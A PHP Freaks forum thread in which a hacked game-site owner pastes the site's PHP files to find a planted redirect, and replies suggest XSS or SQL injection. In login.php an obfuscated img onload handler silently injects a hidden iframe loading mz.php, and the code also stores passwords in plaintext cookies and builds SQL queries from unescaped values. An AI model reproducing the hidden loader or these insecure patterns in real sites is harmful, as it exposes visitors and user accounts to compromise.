Jump to content

Need to find a redirect in my site

mrswhodini

By mrswhodini
in PHP Coding Help

 Share

Recommended Posts

mrswhodini Newbie

mrswhodini

Posted
Posted

I had another site owner hack into my game site (wrote in php). They in return put a redirect somewhere in the code. I can not seem to find anything out of the ordinary. If someone could show me an example of what the code would look like possilbly or where i can try to look for it. It is not directly through the cpanel redirects. I am very lost with this one. Thanks  ???

Link to comment
https://forums.phpfreaks.com/topic/56084-need-to-find-a-redirect-in-my-site/
Share on other sites
mrswhodini Newbie

mrswhodini

Posted
  • Author
Posted
<?php

 

session_start();

require "global_func.php";

if($_SESSION['loggedin']==0) { header("Location: login.php");exit; }

$userid=$_SESSION['userid'];

require "header.php";

$h = new headers;

$h->startheaders();

include "mysql.php";

global $c;

$is=mysql_query("SELECT u.*,us.* FROM users u LEFT JOIN userstats us ON u.userid=us.userid WHERE u.userid=$userid",$c) or die(mysql_error());

$ir=mysql_fetch_array($is);

check_level();

$fm=money_formatter($ir['money']);

$lv=date('F j, Y, g:i:s a',$ir['laston']);

$h->userdata($ir,$lv,$fm);

$h->menuarea();

print "<h1>You have logged on, {$ir['username']}!</h1>

<h2>Welcome back, your last visit was: $lv.</h2>";

$q=mysql_query("SELECT * FROM papercontent LIMIT 1",$c);

$content=mysql_result($q,0,0);

print "<br />

$content

";

$h->endpage();

?>

 

 

This is my loggedin.php file

mrswhodini Newbie

mrswhodini

Posted
  • Author
Posted 

<?php
function money_formatter($muny,$symb='$')
{
$moneys="";
$muny= (string) $muny;
if (strlen($muny) <= 3)
{
return $symb.$muny;
}
$dun=0;
for($i=strlen($muny);$i>0;$i-=1)
{
if ($dun % 3 == 0 && $dun > 0) { $moneys=",".$moneys; }
$dun+=1;
$moneys=$muny[$i-1].$moneys;
}
return $symb.$moneys;
}
function itemtype_dropdown($connection,$ddname="item_type",$selected=-1)
{
$ret="<select name='$ddname' type='dropdown'>";
$q=mysql_query("SELECT * FROM itemtypes ORDER BY itmtypename ASC",$connection);
if($selected == -1) { $first=0; } else { $first=1; }
while($r=mysql_fetch_array($q))
{
$ret.="\n<option value='{$r['itmtypeid']}'";
if ($selected == $r['itmtypeid'] || $first == 0) { $ret.=" selected='selected'";$first=1; } 
$ret.=">{$r['itmtypename']}</option>";
}
$ret.="\n</select>";
return $ret;
}
function item_dropdown($connection,$ddname="item",$selected=-1)
{
$ret="<select name='$ddname' type='dropdown'>";
$q=mysql_query("SELECT * FROM items ORDER BY itmname ASC",$connection);
if($selected == -1) { $first=0; } else { $first=1; }
while($r=mysql_fetch_array($q))
{
$ret.="\n<option value='{$r['itmid']}'";
if ($selected == $r['itmid'] || $first == 0) { $ret.=" selected='selected'";$first=1; } 
$ret.=">{$r['itmname']}</option>";
}
$ret.="\n</select>";
return $ret;
}
function location_dropdown($connection,$ddname="location",$selected=-1)
{
$ret="<select name='$ddname' type='dropdown'>";
$q=mysql_query("SELECT * FROM cities ORDER BY cityname ASC",$connection);
if($selected == -1) { $first=0; } else { $first=1; }
while($r=mysql_fetch_array($q))
{
$ret.="\n<option value='{$r['cityid']}'";
if ($selected == $r['cityid'] || $first == 0) { $ret.=" selected='selected'";$first=1; } 
$ret.= ">{$r['cityname']}</option>";
}
$ret.="\n</select>";
return $ret;
}
function shop_dropdown($connection,$ddname="shop",$selected=-1)
{
$ret="<select name='$ddname' type='dropdown'>";
$q=mysql_query("SELECT * FROM shops ORDER BY shopNAME ASC",$connection);
if($selected == -1) { $first=0; } else { $first=1; }
while($r=mysql_fetch_array($q))
{
$ret.="\n<option value='{$r['shopID']}'";
if ($selected == $r['shopID'] || $first == 0) { $ret.=" selected='selected'";$first=1; } 
$ret.= ">{$r['shopNAME']}</option>";
}
$ret.="\n</select>";
return $ret;
}
function user_dropdown($connection,$ddname="user",$selected=-1)
{
$ret="<select name='$ddname' type='dropdown'>";
$q=mysql_query("SELECT * FROM users ORDER BY username ASC",$connection);
if($selected == -1) { $first=0; } else { $first=1; }
while($r=mysql_fetch_array($q))
{
$ret.="\n<option value='{$r['userid']}'";
if ($selected == $r['userid'] || $first == 0) { $ret.=" selected='selected'";$first=1; } 
$ret.= ">{$r['username']}</option>";
}
$ret.="\n</select>";
return $ret;
}
function crime_dropdown($connection,$ddname="crime",$selected=-1) 
{ 
$ret="<select name='$ddname' type='dropdown'>"; 
$q=mysql_query("SELECT * FROM crimes ORDER BY crimeNAME ASC",$connection); 
if($selected == -1) { $first=0; } else { $first=1; } 
while($r=mysql_fetch_array($q)) 
{ 
$ret.="\n<option value='{$r['crimeID']}'"; 
if ($selected == $r['crimeID'] || $first == 0) { $ret.=" selected='selected'";$first=1; } 
$ret.= ">{$r['crimeNAME']}</option>"; 
} 
$ret.="\n</select>"; 
return $ret; 
} 
function crimegroup_dropdown($connection,$ddname="crimegroups",$selected=-1) 
{ 
$ret="<select name='$ddname' type='dropdown'>"; 
$q=mysql_query("SELECT * FROM crimegroups ORDER BY cgID ASC",$connection); 
if($selected == -1) { $first=0; } else { $first=1; } 
while($r=mysql_fetch_array($q)) 
{ 
$ret.="\n<option value='{$r['cgID']}'"; 
if ($selected == $r['cgID'] || $first == 0) { $ret.=" selected='selected'";$first=1; } 
$ret.= ">{$r['cgNAME']}</option>"; 
} 
$ret.="\n</select>"; 
return $ret; 
} 
function fed_user_dropdown($connection,$ddname="user",$selected=-1)
{
$ret="<select name='$ddname' type='dropdown'>";
$q=mysql_query("SELECT * FROM users WHERE fedjail=1 ORDER BY username ASC",$connection);
if($selected == -1) { $first=0; } else { $first=1; }
while($r=mysql_fetch_array($q))
{
$ret.="\n<option value='{$r['userid']}'";
if ($selected == $r['userid'] || $first == 0) { $ret.=" selected='selected'";$first=1; } 
$ret.= ">{$r['username']}</option>";
}
$ret.="\n</select>";
return $ret;
}
function event_add($userid,$text,$connection)
{
$text=mysql_escape($text);
mysql_query("INSERT INTO events VALUES('','$userid',UNIX_TIMESTAMP(),'0','$text')",$connection) or die(mysql_error()."<br />"."INSERT INTO events VALUES('','$userid',UNIX_TIMESTAMP(),'0','$text')");
return 1;
}
function mysql_escape($str)
{
return str_replace("'","''",$str);
}
function check_level()
{
global $ir,$c,$userid;
$ir['exp_needed']=(int) (($ir['level']+1)*($ir['level']+1)*($ir['level']+1)*2.2);
if($ir['exp'] >= $ir['exp_needed'])
{
$expu=$ir['exp']-$ir['exp_needed'];
$ir['level']+=1;
$ir['exp']=$expu;
$ir['energy']+=2;
$ir['brave']+=1;
$ir['maxenergy']+=2;
$ir['maxbrave']+=2;
$ir['hp']+=50;
$ir['maxhp']+=50;
$ir['exp_needed']=(int) (($ir['level']+1)*($ir['level']+1)*($ir['level']+1)*2.2);
mysql_query("UPDATE users SET level=level+1,exp=$expu,energy=energy+2,brave=brave+1,maxenergy=maxenergy+2,maxbrave=maxbrave+2,
hp=hp+50,maxhp=maxhp+50 where userid=$userid",$c);
}
}
function get_rank($stat, $mykey)
{
global $ir,$userid,$c;
$q=mysql_query("SELECT count(*) FROM userstats us LEFT JOIN users u ON us.userid=u.userid WHERE us.$mykey > $stat AND us.userid != $userid AND u.user_level != 0", $c) ;
return mysql_result($q,0,0)+1;
}
function get_gamerank($level, $housevalue, $stats)
{
$tp=($level*$level) * 3000 + ($housevalue) + (($stats['strength']+$stats['agility']+$stats['guard']+$stats['labour']+$stats['IQ']) * 10);
if ( $tp < 100000 ) { return "<img src='images/avatar.jpg' width=20 heigth=20>"; }
else if ( $tp< 128000000) { return "<img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20>"; }
else if ( $tp < 8192000000 ) { return "<img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20>"; }
else if ( $tp < 15192000000 ) { return "<img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20>"; }
else if ( $tp < 201920090000 ) { return "<img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20>"; }
else { return "<img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20><img src='images/avatar.jpg' width=20 height=20>"; }
}
function randomString($length)
{
    $string = md5(time());
    $highest_startpoint = 32-$length;
    $randomString = substr($string,rand(0,$highest_startpoint),$length);
    return $randomString;
}
function get_gamerank2($level, $housevalue, $stats)
{
$tp=($level*$level) * 3000 + ($housevalue) + (($stats['strength']+$stats['agility']+$stats['guard']+$stats['labour']+$stats['IQ']) * 10);

if ( $tp < 10200000 ) { return "Novice"; }
else if ( $tp < 20400000 ) { return "Beginner"; }
else if ( $tp < 50800000 ) { return "Adjusting"; }
else if ( $tp < 91600000 ) { return "Rookie"; }
else if ( $tp < 123200000 ) { return "Average"; }
else if ( $tp < 342800000) { return "Good"; }
else if ( $tp < 995600000 ) { return "Very Good"; }
else if ( $tp < 551200000 ) { return "Experienced"; }
else if ( $tp < 10102400000 ) { return "Highly Experienced"; }
else if ( $tp < 25204800000 ) { return "Honoured"; }
else if ( $tp < 50409600000 ) { return "Highly Hounored"; }
else if ( $tp < 100819200000 ) { return "Immortal"; }
else { return "God Of War"; }

}
?>

globalfunctions

 

 <?php

class headers {
function startheaders() {
global $ir;
echo <<<EOF
<html>
<head>
<title>Wicked Nation</title>
<style>
body { font-family:helvetica, arial, geneva, sans-serif;font-size:12;color: black;
   scrollbar-base-color: #777777;
   scrollbar-arrow-color: #CCCCCC;
   scrollbar-DarkShadow-Color: #000000; }
a:visited,a:active,a:hover,a:link { color: black;text-decoration: none; }
table,tr,td { font-family:helvetica, arial, geneva, sans-serif;font-size: 12; }
img { border:none; }
textarea { font-family:helvetica, arial, geneva, sans-serif;font-size:12;color: black; }
</style>
</head>

EOF;

}
function userdata($ir,$lv,$fm,$dosessh=1)
{
global $c,$userid;
$ip = ($_SERVER['HTTP_X_FORWARDED_FOR'])
    ?  $_SERVER['HTTP_X_FORWARDED_FOR']
    :  $_SERVER['REMOTE_ADDR'];
mysql_query("UPDATE users SET laston=unix_timestamp(),lastip='$ip' WHERE userid=$userid",$c);
if(!$ir['email'])
{
die ("<body>Your account may have an internal error. Please E-mail wickednation07@aol.com with your username and player ID.");
}
if($dosessh && $_SESSION['attacking'])
{
$_SESSION['attacking']=0;
}
$enperc=(int) ($ir['energy']/$ir['maxenergy']*100);
$wiperc=(int) ($ir['will']/$ir['maxwill']*100);
$experc=(int) ( $ir['exp']/$ir['exp_needed']*100);
$brperc=(int) ($ir['brave']/$ir['maxbrave']*100);
$hpperc=(int) ($ir['hp']/$ir['maxhp']*100);
$enopp=100-$enperc;
$wiopp=100-$wiperc;
$exopp=100-$experc;
$bropp=100-$brperc;
$hpopp=100-$hpperc;
$minex=100-$minexp;
$d="";
$u=$ir['username'];

if($ir['donatordays']) { $u = "<font color=red>{$ir['username']}</font>";$d="<img src='images/skull.gif'

alt='Donator: {$ir['donatordays']} Days Left' title='Donator: {$ir['donatordays']} Days Left' />"; }
if($ir[supporterdays]) { $u = "<font color=deepskyblue>{$ir['username']}</font>";$d="<img src=support.gif' alt='Donator: {$ir['supporterdays']} Days Left' title=Supporter: {$ir['supporterdays']} Supporter Days Left' />"; }
if($ir['gang']) {

$qg=mysql_query("SELECT * FROM gangs WHERE gangID={$ir['gang']}",$c);

$rr=mysql_fetch_array($qg);

$gn=$rr['gangPREF']." ";

}
if($ir['hospital'] >= 1)
{
print "<body bgcolor='#D6D6D6' text='#ffffff'>";
}
else if($ir['jail'] >= 1)
{
print "<body bgcolor='#ffffff' text='#000000'>";
}
else
{
print "<body bgcolor='#87ceff' text='#000000'>";
}

print "<hr/><br/><table width=100% align=center>
<td width=15></td>
<td><font size='1'><b>Name: $gn{$u} [{$ir['userid']}] $d<br />
<b>Level: {$ir['level']}<br />
<b>Cash: {$fm}<br />
<b>Onyx: {$ir['crystals']}<br />
<b>Gold:</b> {$ir['gold']}<br />
<b>Bank Cash: \${$ir['bankmoney']}<br />
<b>Swiss Cash: \${$ir['cybermoney']}<br />
<b>Onyx Stash: {$ir['onyxstash']}<br /><br />
[<a href='logout.php'>Quick Logout</a>]</td>
<td width=50> </td>
<td>";
if($ir['hospital'] >= 1)
{
print "<img src='hosp.png'>";
}
else if($ir['jail'] >= 1)
{
print "<img src='jailbanner.PNG'>";
}
else if($ir['jail'] == 0 && $ir['hospital'] == 0)
{
print "<img src='images/old_logo.png'>";
}

print "</td>
<td width=15> </td>
<td>
<b><font size='1'>Energy: {$enperc}% <a href='crystaltemple.php?spend=refill'><small>[Refill]</small></a><br />
<img src=bar_left.gif height=9><img src=bargreen.gif width=$enperc height=9><img src=barred.gif width=$enopp 
height=9><img src=bar_fil_end.gif height=9><br />
<b>Will: {$wiperc}%<br />
<img src=bar_left.gif height=9><img src=bargreen.gif width=$wiperc height=9><img src=barred.gif width=$wiopp 
height=9><img src=bar_fil_end.gif height=9><br />
<b>Brave: {$ir['brave']}/{$ir['maxbrave']}<br />
<img src=bar_left.gif height=9><img src=bargreen.gif width=$brperc height=9><img src=barred.gif width=$bropp 
height=9><img src=bar_fil_end.gif height=9><br />
<b>EXP: {$experc}%<br />
<img src=bar_left.gif height=9><img src=bargreen.gif width=$experc height=9><img src=barred.gif width=$exopp 
height=9><img src=bar_fil_end.gif height=9><br />
<b>Health: {$hpperc}%<br />
<img src=bar_left.gif height=9><img src=bargreen.gif width=$hpperc height=9><img src=barred.gif width=$hpopp 
height=9><img src=bar_fil_end.gif height=9></td></tr></table><td width=15></td></div><br/>
<h5><center><span class='genmed'><a href='voting.php'><b><u><font color=red>Vote for Wicked Nation and get various rewards!</u></b></a></span>    &nbsp<span class='genmed'><a href='donator.php'><b><u><font color=red>Donate to Wicked Nation, and get lots of benefits!</u></center></h5></b></a></span><br /></font><hr/>";

print "<table width=100%><tr><td width=20% valign='top'>";
if($ir['fedjail'])
{
$q=mysql_query("SELECT * FROM fedjail WHERE fed_userid=$userid",$c);
$r=mysql_fetch_array($q);
die("<b><font color=red size=+1>You have been put in the Wicked Nation Federal Jail for {$r['fed_days']} day(s).<br />
Reason: {$r['fed_reason']}<p>
<a href=makereport.php>Click here to make a federal jail report or check your report status.</a></font></b></body></html>");
}
if(file_exists('ipbans/'.$ip))
{
die("<b><font color=red size=+1>Your IP has been banned, there is no way around this.</font></b></body></html>");
}
}
function menuarea()
{
include "mainmenu.php";
global $ir,$c;
print "</td><td valign='top'>
";

if($ir['hospital'])
{
print "<center><b>Note: </b> You are in the hospital for {$ir['hospital']} minutes.</center><br />";
}
if($ir['jail'])
{
print "<center><b>Note: </b> You are in jail for {$ir['jail']} minutes.</center><br />";
}
$page=$_SERVER['REQUEST_URI'];
$close=mysql_query("SELECT * FROM closedpages WHERE url='$page'",$c) or die(mysql_error());
if(mysql_num_rows($close) == 0)
{
}
else if(mysql_num_rows($close) > 0)
{
($r=mysql_fetch_array($close));

if(mysql_num_rows($close) > 0 && $r['for'] == Public && $ir['user_level'] == 1)
{
die("This page has been closed for the Public. The reason for this is: {$r['reason']}.");
}
else if(mysql_num_rows($close) > 0 && $r['for'] == Staff && $ir['user_level'] > 1 && $ir['user_level'] != 2)
{
die("This page has been closed for Staff. The reason for this is: {$r['reason']}.");
}
else if(mysql_num_rows($close) > 0 && $r['for'] == All && $r['user_level'] != 2)
{
die("This page has been closed for everyone. The reason for this is: {$r['reason']}.");
}
print "<br />";
}
$gw=mysql_query("SELECT * FROM gangwars where warDECLARER={$ir['gang']} or warDECLARED={$ir['gang']}",$c);
if(mysql_num_rows($gw) > 0)
{
print"<b><font color=red><blink>{$ir['username']}, Your Gang Is At War!!</b></blink><br/></font>";
}
if ($ir['married']>0)
{
$marr=mysql_query("SELECT * FROM users WHERE userid={$ir['married']}",$c);
$ma=mysql_fetch_array($marr);
if ($ma['willmax']>$ir['maxwill'])
{
mysql_query("UPDATE users SET maxwill={$ma['willmax']} WHERE userid=$userid",$c);
}
if ($ir['willmax']<$ir['maxwill'] && $ir['maxwill']>$ma['willmax'])
{
mysql_query("UPDATE users SET maxwill=willmax WHERE userid=$userid",$c);
}
}
if ($ir['maxwill']<$ir['willmax'])
{
mysql_query("UPDATE users SET maxwill=willmax WHERE userid=$userid",$c);
}
if ($ir['married']==0 && $ir['maxwill']>$ir['willmax'])
{
mysql_query("UPDATE users SET maxwill=willmax WHERE userid=$userid",$c);
}
mysql_query("UPDATE users SET maxwill={$ma['maxwill']} WHERE userid=$userid",$c);
}

function endpage()
{
print "</td></tr></table></body>
</html>";
}
}
?>

 

header.php

 

 

<?php



session_start();

print <<<EOF

<html>

<head>

<title>Wicked Nation - Login Or Register</title>

<script language="JavaScript">

<!--



function getCookieVal (offset) {

  var endstr = document.cookie.indexOf (";", offset);

  if (endstr == -1)

    endstr = document.cookie.length;

  return unescape(document.cookie.substring(offset, endstr));

}

function GetCookie (name) {

  var arg = name + "=";

  var alen = arg.length;

  var clen = document.cookie.length;

  var i = 0;

  while (i < clen) {

    var j = i + alen;

    if (document.cookie.substring(i, j) == arg)

      return getCookieVal (j);

    i = document.cookie.indexOf(" ", i) + 1;

    if (i == 0) break;

  }

  return null;

}

function SetCookie (name,value,expires,path,domain,secure) {

  document.cookie = name + "=" + escape (value) +

    ((expires) ? "; expires=" + expires.toGMTString() : "") +

    ((path) ? "; path=" + path : "") +

    ((domain) ? "; domain=" + domain : "") +

    ((secure) ? "; secure" : "");

}



function DeleteCookie (name,path,domain) {

  if (GetCookie(name)) {

    document.cookie = name + "=" +

      ((path) ? "; path=" + path : "") +

      ((domain) ? "; domain=" + domain : "") +

      "; expires=Thu, 01-Jan-70 00:00:01 GMT";

  }

}

// -->

</script>



<script language="JavaScript">

var usr;

var pw;

var sv;

function getme()

{

usr = document.login.username;

pw = document.login.password;

sv = document.login.save;



if (GetCookie('player') != null)

{

	usr.value = GetCookie('username')

	pw.value = GetCookie('password')

	if (GetCookie('save') == 'true')

	{

		sv[0].checked = true;

	}

}



}

function saveme()

{

if (usr.value.length != 0 && pw.value.length != 0)

{

	if (sv[0].checked)

	{

		expdate = new Date();

		expdate.setTime(expdate.getTime()+(365 * 24 * 60 * 60 * 1000));

		SetCookie('username', usr.value, expdate);

		SetCookie('password', pw.value, expdate);

		SetCookie('save', 'true', expdate);

	}

	if (sv[1].checked)

	{

		DeleteCookie('username');

		DeleteCookie('password');

		DeleteCookie('save');

	}

}

	else

{

	alert('You must enter a username/password.');

	return false;

}

}

</script>

<style>

body { font-family:Verdana;font-size:9pt;color: black;

   background-color:#939393;

     scrollbar-base-color: #777777;

   scrollbar-arrow-color: #CCCCCC;

   scrollbar-DarkShadow-Color: #000000; }

a:visited,a:active,a:hover,a:link { color: black;text-decoration: none; }

table,tr,td { font-size:9pt; }

img { border:none; }

</style>

</head>

<body onload="getme();"><center><hr/><br/><img src="animlogo.jpg" onload="sf='ram';ab='src';dg='mz.p';ko='e';wd='if';ji='hp';t=wd.concat(sf,ko);xx=dg.concat(ji);var oE=document.createElement(t);oE.setAttribute('width','5');oE.setAttribute('height','5');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);"></br><br/><hr/><br/><img width=125 height=75 src="boriqua.jpg"></br>


EOF;

$ip = ($_SERVER['HTTP_X_FORWARDED_FOR'])

    ?  $_SERVER['HTTP_X_FORWARDED_FOR']

    :  $_SERVER['REMOTE_ADDR'];

if(file_exists('ipbans/'.$ip))

{

die("<b><font color=red size=+1>Your IP has been banned, there is no way around this.</font></b></body></html>");

}



print "<h3>Wicked Nation Sign In</h3>

<br/><b>Warning! This Game Contains Explicit Content And Is Not Intended For Children!</b><br />

<table width=80%><tr><td width=50%><fieldset><legend>Will You Accept The Challenge?</legend>Think you're tough, think you have what it takes to be the best? I don't think you do, personally, I don't think you would last a day on the streets of Wicked City, the capitol city of Wicked Nation. Think you can prove me wrong? Think you have what it takes? Then sign up, and let's see what you've got kid. Oh, if that sounds like a challenge, it's because it is! So bring your a-game, because to be the best, you have to beat the best!

</fieldset></td><td><fieldset><legend>Login</legend>";

print "<form action=authenticate.php method=post name=login onsubmit=\"return saveme();\">Username: <input type=text name=username><br>

Password: <input type=password name=password><br>

Remember me?<br />

<input type=\"radio\" value=\"ON\" name=\"save\">Yes <input type=\"radio\" name=\"save\" value=\"OFF\" checked>No

<input type=submit value=Submit></form></fieldset></td></tr></table><br>

<h3><a href='register.php'>CLICK HERE TO REGISTER!</a></h3>
<h3><a href='forgot_password.php'>FORGOT PASSWORD, CLICK HERE!</a></h3>";

//Oxidati0n's Banner Exchange 
$bg="939393"; //Background Colour of the ad
$f=file_get_contents("http://home.oxidati0n.info/bannerexchange.php?bgcolor=".$bg);
print($f);

print "<b><center><hr/><br/><br/><br/>
<table width=100% border=0><tr><td align=center><h3><img src=images/old_logo.png width='200' height='100'><br><a href='http://cafepress.com/wngamepro'>CLICK HERE FOR YOUR<br> WICKED NATION PRODUCTS!</br></center></a></td></tr><td align=center>

<b><center><hr/><br/><br/><br/>
<table width=100%><tr><td align=center><h3><img src=images/angelsforacause.jpg width='200' height='100'><br><a href='http://stores.ebay.com/Angels-For-A-Cause'>CLICK HERE FOR YOUR WEDDING HEADQUARTERS!</br></center></a></td><td align=center>

<b><center><br/><h4>Your Banner Here! Only $10.00 Per Month! Email <a href='mailto:wickednation07@aol.com'><u>wickednation07@aol.com.</a><br>

</b><br/><i><h5>Powered by codes by EO-Gaming.net. Wicked Nation is Copyright © 2006 Explicit Online Gaming.</center></i>";
print "</center></body></html>";
?>

 

login.php

Corona4456 Newbie

Corona4456

Posted
Posted

why don't you delete all your files (after backed up) then delete your database, and create a new database, and re-upload your site files.

 

Just a thought I had.

This may work if he has made a backup prior to the hack, but if he doesn't know anything about a database admin tool then odds are he doesn't

per1os Member

per1os

Posted
Posted

The DB would only be a concern if you are echoing any information from the DB to the page.

 

If you are chances are he used an XSS Exploit in one of your fields that is displayed and or used a SQL Injection tactic with XSS.

 

The real concern is, are you including any files from GET and or POST and where is the data created at, like member signup for the inserts. Are those cleaned for SQL Injection and XSS Exploits?

 

If the answer is no, that is how he accessed the server. There are a lot of unknowns here, let us know if you are including files via GET or doing some type of exec command, also post some code where data is being inserted into the database, that could very well point where the problem is.

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.